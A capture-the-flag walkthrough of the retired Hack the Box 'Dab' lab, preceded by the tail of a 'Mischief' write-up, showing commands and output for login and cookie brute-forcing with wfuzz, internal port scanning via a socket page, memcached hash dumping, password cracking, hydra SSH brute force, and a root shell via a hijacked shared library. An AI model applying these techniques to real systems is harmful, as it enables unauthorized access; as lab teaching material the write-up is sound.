Therefore, we move back to www-data user shell to run switch user command and enter the above-found password for root login, then try to find out root.txt file inside the root directory but there wasn’t any flag. Therefore with the help of find command, we try to enumerate the path of root.txt.

www-data@Mischief:/var/www/html$ su
su
Password: lokipasswordmischieftrickery

root@Mischief:/var/www/html# find / -name root.txt
find / -name root.txt
/usr/lib/gcc/x86_64-linux-gnu/7/root.txt
/root/root.txt
root@Mischief:/var/www/html# cat /usr/lib/gcc/x86_64-linux-gnu/7/root.txt
cat /usr/lib/gcc/x86_64-linux-gnu/7/root.txt
ae1*****807

Author: Jacco Straathof

HTB – Dab

Today we are going to solve another CTF challenge “Dab”. It is a retired vulnerable lab presented by Hack the Box for helping pentester’s to perform online penetration testing according to your experience level; they have a collection of vulnerable labs as challenges, from beginners to Expert level.

Level: Expert

Task: To find user.txt and root.txt file

Let’s start off with our basic Nmap command to find out the open ports and services.

root@kali:~/htb/dab# nmap -sC -sV -oA nmap 10.10.10.86
Starting Nmap 7.70 ( https://nmap.org ) at 2019-03-27 10:14 EDT
Nmap scan report for 10.10.10.86
Host is up (0.029s latency).
Not shown: 996 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r-- 1 0 0 8803 Mar 26 2018 dab.jpg
| ftp-syst: 
| STAT: 
| FTP server status:
| Connected to ::ffff:10.10.14.20
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 3
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
| 2048 20:05:77:1e:73:66:bb:1e:7d:46:0f:65:50:2c:f9:0e (RSA)
| 256 61:ae:15:23:fc:bc:bc:29:13:06:f2:10:e0:0e:da:a0 (ECDSA)
|_ 256 2d:35:96:4c:5e:dd:5c:c0:63:f0:dc:86:f1:b1:76:b5 (ED25519)
80/tcp open http nginx 1.10.3 (Ubuntu)
|_http-server-header: nginx/1.10.3 (Ubuntu)
| http-title: Login
|_Requested resource was http://10.10.10.86/login
8080/tcp open http nginx 1.10.3 (Ubuntu)
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: nginx/1.10.3 (Ubuntu)
|_http-title: Internal Dev
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 25.85 seconds

The Nmap scan shows us that there are 4 ports open: 21(FTP), 22(SSH), 80(HTTP), 8080(HTTP)

As port 21 is open, we access it using FTP and find a JPG file. We download it to our system to find more information about the image file.

We use a tool called “steghide” to find if there is any file hidden inside the image and find a hidden text file called “dab.txt”. We extract the file and open it and find that it was a dead end.

steghide --info dab.jpg
steghide extract -sf dab.jpg -xf dab.txt
root@kali:~/htb/dab# curl -s 'http://10.10.10.86/login'
<html>
<head>
<title>Login</title>
<meta name="viewport" content="width=device-width, initial-scale=1.0">
</head>
<body>
<div class="container">
<h1>Please login</h1>
<form action="" method="post">
<input type="text" placeholder="Username" name="username">
<input type="password" placeholder="Password" name="password">
<input type="submit" name="submit" value="Login">
</form>

</div>
</body>
</html>

Port 8080 is also running HTTP, we try to access the web service and get an error that the authentication cookie is not set.

root@kali:~/htb/dab# curl -s 'http://10.10.10.86:8080'
<!DOCTYPE html>
<html lang="en">
<head>
<title>Internal Dev</title>
<meta charset="UTF-8">
<meta name="viewport" content="initial-scale=1, maximum-scale=1, user-scalable=no, width=device-width">
</head>
<body>
<div class="container wrapper">

Access denied: password authentication cookie not set

</div>
</body>
</html>

The request to http://10.10.10.86/login is captured in Burp Suite and parameters examined.

Wfuzz is used to brute force the admin password. Incorrect responses are 18 lines in length and these are hidden from output

root@kali:~/htb/dab# wfuzz -c --hl=18 -w /usr/share/SecLists/Passwords/darkweb2017-top1000.txt -d 'username=admin&password=FUZZ&submit=Login' http://10.10.10.86/login

********************************************************
* Wfuzz 2.3.3 - The Web Fuzzer *
********************************************************

Target: http://10.10.10.86/login
Total requests: 1000

==================================================================
ID Response Lines Word Chars Payload 
==================================================================

000277: C=500 4 L 40 W 291 Ch "пїЅпїЅпїЅпїЅпїЅпїЅ"
000523: C=302 3 L 24 W 209 Ch "Password1"
000627: C=500 4 L 40 W 291 Ch "пїЅпїЅпїЅпїЅпїЅпїЅпїЅ"
000705: C=500 4 L 40 W 291 Ch "пїЅпїЅпїЅпїЅпїЅпїЅпїЅпїЅ"

Total time: 5.121295
Processed Requests: 1000
Filtered Requests: 996
Requests/sec.: 195.2630

We find the correct username and password to be “admin: Password1”.

We could also

Fuzzing with ZAP

First thing to mention is the wordlist , because we are bruteforcing remotely it’s better to use a small wordlist so we won’t use rockyou here. I used darkweb2017-top10000.txt from Seclists

Let’s start zap and intercept the request again.
Then right click –> attack –> fuzzer . After that we highlight the place we want to fuzz , that will be the password parameter value. Add –> Add then we paste the wordlist content
.

We are still not able to access the web application on port 8080, as it still shows the same cookie error. So we brute-force the cookie parameter using burp suite.

After selecting “rockyou.txt” as wordlist, we find the cookie parameter is called “password”. We also get another error; stating that the password authentication cookie is incorrect.

We use wfuzz to  brute force the “password” variable and find the value to be “secret”.

root@kali:~/htb/dab# wfuzz -u http://10.10.10.86:8080/ --hl=14 -w /usr/share/SecLists/Passwords/darkweb2017-top10000.txt -b password=FUZZ

********************************************************
* Wfuzz 2.3.3 - The Web Fuzzer *
********************************************************

Target: http://10.10.10.86:8080/
Total requests: 10000

==================================================================
ID Response Lines Word Chars Payload 
==================================================================

000211: C=200 21 L 48 W 540 Ch "secret"
003640: C=200 14 L 29 W 324 Ch "123456v"^C
Finishing pending requests...

Using burpsuite we change the cookie and are now able to access the web page. After accessing it we find a web application that can be used to send a command to a certain port.

Memcached

Using this page, I was able to enumerate a further local service listening at 11211/tcpmemcached. It’s easy. Any non-listening port will result in a respode code of 500 (INTERNAL SERVER ERROR). Again, we’ll use wfuzz.

root@kali:~/htb/dab# wfuzz -c -z range,1-65535 -u 'http://10.10.10.86:8080/socket?port=FUZZ&cmd=puck' -H "Cookie: password=secret" --hc=500

********************************************************
* Wfuzz 2.3.3 - The Web Fuzzer *
********************************************************

Target: http://10.10.10.86:8080/socket?port=FUZZ&cmd=abc
Total requests: 65535

==================================================================
ID Response Lines Word Chars Payload 
==================================================================

000021: C=200 28 L 61 W 627 Ch "21"
000022: C=200 28 L 55 W 629 Ch "22"
000080: C=200 40 L 84 W 1010 Ch "80"
008080: C=200 40 L 84 W 1010 Ch "8080"
011211: C=200 27 L 52 W 576 Ch "11211"
011488: C=500 4 L 40 W 291 Ch "11488"^C
Finishing pending requests...

Now port 11211 is for Memcached server, so we run version command to check the version of the Memcached server.

root@kali:~/htb/dab# curl -s 'http://10.10.10.86:8080/socket?port=11211&cmd=version'
<!DOCTYPE html>
<html lang="en">
<head>
<title>Internal Dev</title>
<meta charset="UTF-8">
<meta name="viewport" content="initial-scale=1, maximum-scale=1, user-scalable=no, width=device-width">
</head>
<body>
<div class="container wrapper">

<p>Status of cache engine: Online</p>
<h4>TCP socket test</h4>
<form action="/socket">
<input type="text" name="port" placeholder="TCP port"></input>
<input type="text" name="cmd" placeholder="Line to send..."></input>
<input type="submit" value="Submit"</input>
</form>

<p>Output</p>
<pre>
VERSION 1.4.25 Ubuntu

</pre>


</div>
</body>
</html>

We find that we are successfully able to get the version of the Memcached server.

let’s find what characters are blacklisted

root@kali:~/htb/dab# wfuzz -c --hw=84 -w /usr/share/SecLists/Fuzzing/alphanum-case-extra.txt -H "Cookie: password=secret" 'http://10.10.10.86:8080/socket?port=80&cmd=FUZZ'

********************************************************
* Wfuzz 2.3.3 - The Web Fuzzer *
********************************************************

Target: http://10.10.10.86:8080/socket?port=80&cmd=FUZZ
Total requests: 95

==================================================================
ID Response Lines Word Chars Payload 
==================================================================

000001: C=200 14 L 27 W 303 Ch "!"
000002: C=200 14 L 27 W 303 Ch """
000003: C=200 14 L 25 W 287 Ch "#"
000004: C=200 14 L 27 W 303 Ch "$"
000007: C=200 14 L 27 W 303 Ch "'"
000008: C=200 14 L 27 W 303 Ch "("
000009: C=200 14 L 27 W 303 Ch ")"
000010: C=200 14 L 27 W 303 Ch "*"
000005: C=200 14 L 27 W 303 Ch "%"
000006: C=200 14 L 25 W 287 Ch "&"
000012: C=200 14 L 27 W 303 Ch ","
000013: C=200 14 L 27 W 303 Ch "-"
000014: C=200 14 L 27 W 303 Ch "."
000015: C=200 14 L 27 W 303 Ch "/"
000026: C=200 14 L 27 W 303 Ch ":"
000027: C=200 14 L 27 W 303 Ch ";"
000028: C=200 14 L 27 W 303 Ch "<"
000029: C=200 14 L 27 W 303 Ch "="
000030: C=200 14 L 27 W 303 Ch ">"
000032: C=200 14 L 27 W 303 Ch "@"
000031: C=200 14 L 27 W 303 Ch "?"
000059: C=200 14 L 27 W 303 Ch "["
000060: C=200 14 L 27 W 303 Ch "\"
000062: C=200 14 L 27 W 303 Ch "^"
000061: C=200 14 L 27 W 303 Ch "]"
000063: C=200 14 L 27 W 303 Ch "_"
000064: C=200 14 L 27 W 303 Ch "`"
000091: C=200 14 L 27 W 303 Ch "{"
000092: C=200 14 L 27 W 303 Ch "|"
000093: C=200 14 L 27 W 303 Ch "}"
000094: C=200 14 L 27 W 303 Ch "~"
000095: C=200 14 L 25 W 287 Ch ""

Total time: 0.789136
Processed Requests: 95
Filtered Requests: 63
Requests/sec.: 120.3847

Now after getting the version of the Memcached server, we try to find all the users that are available on the web server. So we send the command “get users” to port 11211.

After running the command, we are successfully able to get username and password hashes available on the memcached server.

We copy the username and password from the web site into a text file so that we can user john the ripper to crack the hashes.

john --format=raw-md5 --show user2.txt > cracked.txt

After cracking the password, we use the saved file to brute-force SSH login using hydra and find the correct credentials to be “genevieve: Princess1”.

hydra -C cracked.txt ssh://10.10.10.86 -t4

Now we use this credential to login through SSH. After logging in we find a file called “user.txt”, when we open it we find our first flag.

root@kali:~/htb/dab# ssh genevieve@10.10.10.86
genevieve@10.10.10.86's password: Princess1
Welcome to Ubuntu 16.04.5 LTS (GNU/Linux 4.4.0-133-generic x86_64)

* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage

0 packages can be updated.
0 updates are security updates.


Last login: Mon Mar 26 23:42:41 2018 from 172.23.10.99
genevieve@dab:~$ ls
user.txt
genevieve@dab:~$ cat user.txt
9bc*****2b1

We now find the file with suid bit set, and find an application called “myexec”.

genevieve@dab:~$ find / -perm -4000 2>/dev/null
/bin/umount
/bin/ping
/bin/ping6
/bin/su
/bin/ntfs-3g
/bin/fusermount
/bin/mount
/usr/bin/at
/usr/bin/newuidmap
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/gpasswd
/usr/bin/chsh
/usr/bin/sudo
/usr/bin/newgidmap
/usr/bin/myexec
/usr/bin/pkexec
/usr/bin/chfn
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/lib/snapd/snap-confine
/usr/lib/openssh/ssh-keysign
/sbin/ldconfig
/sbin/ldconfig.real

We run the application and find that it is asking for a password.

We now use ltrace to find the password of the application.

Now when we give the correct password and run it with ltrace. We find that a function is missing from the application.

We find the shared library that the application is using. We check “/etc/ld.so.conf.d/test.conf” to find the location from which the preloaded library is accepted and find it is “/tmp” directory.

Now create a C program to execute “/bin/bash” inside /tmp directory.

#include <unistd.h>
void seclogin()
{
setuid(0);
setgid(0);
system("/bin/bash");
}

We compile it as a shared library.

genevieve@dab:/tmp$ gcc -shared -fPIC -o libseclogin.so libseclogin.c
libseclogin.c: In function ‘seclogin’:
libseclogin.c:6:2: warning: implicit declaration of function ‘system’ [-Wimplicit-function-declaration]
system("/bin/bash");
^
genevieve@dab:/tmp$ ls
libseclogin.c libseclogin.so systemd-private-878abaa780d9451ca3a9b312f4979967-systemd-timesyncd.service-u6R6Yx vmware-root

Now we’r inside the /tmp/ directory wend cache the shared library using “ldconfig”. Then when running the application and give it the correct password we are able to spawn a bash shell as the root user. We move to /root directory and find a file called “root.txt”. We take a look at the content of the file and find the final flag.

genevieve@dab:/tmp$ vi libseclogin.c
genevieve@dab:/tmp$ gcc -shared -fPIC -o libseclogin.so libseclogin.c
libseclogin.c: In function ‘seclogin’:
libseclogin.c:6:2: warning: implicit declaration of function ‘system’ [-Wimplicit-function-declaration]
system("/bin/bash");
^
genevieve@dab:/tmp$ ls
libseclogin.c libseclogin.so systemd-private-878abaa780d9451ca3a9b312f4979967-systemd-timesyncd.service-u6R6Yx vmware-root
enevieve@dab:~$ cat /tmp/libseclogin.c
include <unistd.h>
void seclogin()
{
	setuid(0);
	setgid(0);
	system("/bin/bash");
}

genevieve@dab:/tmp$ ldconfig
genevieve@dab:/tmp$ /usr/bin/myexec
Enter password: s3cur3l0g1n
Password is correct

root@dab:/# cd /root
root@dab:/root# cat root.txt 
45c*****a98e

Author: Jacco Straathof